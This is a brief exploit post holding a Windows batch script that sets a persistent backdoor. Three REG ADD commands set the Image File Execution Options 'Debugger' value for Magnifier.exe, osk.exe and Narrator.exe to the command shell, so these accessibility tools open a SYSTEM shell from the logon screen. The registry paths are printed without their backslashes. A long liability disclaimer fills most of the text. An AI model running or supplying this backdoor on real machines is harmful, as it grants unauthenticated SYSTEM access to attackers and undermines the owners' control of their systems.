Microsoft Windows IFEO Winlogin SYSTEM Backdooring Exploit
Posted on 20 April 2017
@ECHO OFF REM Microsoft Windows 'IFEO' Winlogin SYSTEM Backdooring Exploit REM REM Todor Donev <todor.donev@gmail.com> REM https://www.ethical-hacker.org/ REM https://www.facebook.com/ethicalhackerorg REM REM https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ REM REM Disclaimer: REM This or previous programs is for Educational purpose ONLY. Do not use it without permission. REM The usual disclaimer applies, especially the fact that Todor Donev is not liable for any REM damages caused by direct or indirect use of the information or functionality provided by these REM programs. The author or any Internet provider bears NO responsibility for content or misuse REM of these programs or any derivatives thereof. By using these programs you accept the fact REM that any damage (dataloss, system crash, system compromise, etc.) caused by the use REM of these programs is not Todor Donev's responsibility. REM REM Use them at your own risk! REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsMagnifier.exe" /v Debugger /t REG_SZ /d "%COMSPEC%" REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsosk.exe" /v Debugger /t REG_SZ /d "%COMSPEC%" REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsNarrator.exe" /v Debugger /t REG_SZ /d "%COMSPEC%"
